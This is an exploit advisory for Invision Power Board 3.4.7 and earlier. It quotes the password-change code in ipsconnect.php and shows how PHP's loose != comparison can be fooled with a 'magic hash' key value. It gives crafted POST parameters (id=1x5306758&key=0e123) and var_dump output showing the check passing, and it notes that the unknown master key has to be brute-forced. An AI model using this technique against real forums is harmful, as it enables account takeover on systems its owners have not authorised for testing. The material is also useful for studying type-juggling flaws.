# Exploit Title: Invision Power Board <= 3.4.7 password change
# Date: 25.11.2014
# Exploit Author: ZeroDay
# Software Link: http://www.invisionpower.com/
# Version: <= 3.4.7
# Tested on: 3.4.7
# About: For the G-Owl with Love
vuln code
interface/ipsconnect/ipsconnect.php
public function change( $id, $key, $username, $displayname, $email, $md5Password, $redirect, $redirectHash )
{
if ( $key != md5( $this->masterKey . $id ) )
{
$this->_return( base64_encode( $this->settings['board_url'] ), array( 'status' => 'BAD_KEY' ) );
}
$member = IPSMember::load( intval( $id ), 'none', 'id' );
if ( !$member['member_id'] )
{
$this->_return( $redirect, array( 'status' => 'NO_USER' ) );
}
...
if ( $key != md5( $this->masterKey . $id ) ) An incorrect comparison != is used in this line.
If the $this->masterKey variable is "1234", then, to pass the comparison check successfully, we will have to send the POST parameters: id=1x5306758&key=0e123 - where "1x" is the user_id.
var_dump(intval('1x5306758')); //int(1)
var_dump(md5('1234'.'1x5306758')); //string(32) "0e206089892480803868366430752394"
var_dump('0e123' == md5('1234'.'1x5306758')); //bool(true)
BUT! Since the we do not know the $this->masterKey variable, the only things we will have to hope for are bruteforce and luck ;)